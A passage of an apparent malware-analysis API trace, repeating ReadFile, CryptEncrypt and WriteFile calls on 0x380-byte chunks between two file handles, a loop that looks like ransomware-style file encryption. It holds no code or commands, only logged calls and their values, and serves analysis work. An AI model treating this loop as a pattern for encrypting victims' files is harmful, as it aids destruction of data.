nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.515] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.515] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.515] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.515] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.516] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.516] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.516] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.516] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.516] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.517] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.517] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.517] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.517] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.517] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.517] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.517] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.518] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.518] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.519] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.519] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.519] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.519] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.519] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.519] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.520] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.520] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.520] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.520] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.520] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.521] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.521] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.521] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.521] CryptEncrypt (in: hKey=0x2fc5c8, 